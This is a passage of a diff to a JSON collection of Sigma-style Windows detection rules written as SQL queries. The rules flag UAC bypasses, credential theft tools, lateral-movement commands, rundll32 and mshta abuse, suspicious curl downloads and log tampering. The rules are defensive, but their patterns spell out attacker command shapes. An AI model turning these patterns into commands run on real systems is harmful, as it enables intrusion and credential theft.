"filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in 
temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": 
"7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing 
scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE 
'%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft 
Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": 
"9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - 
"attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": 
"test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - 
"status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - 
"title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" 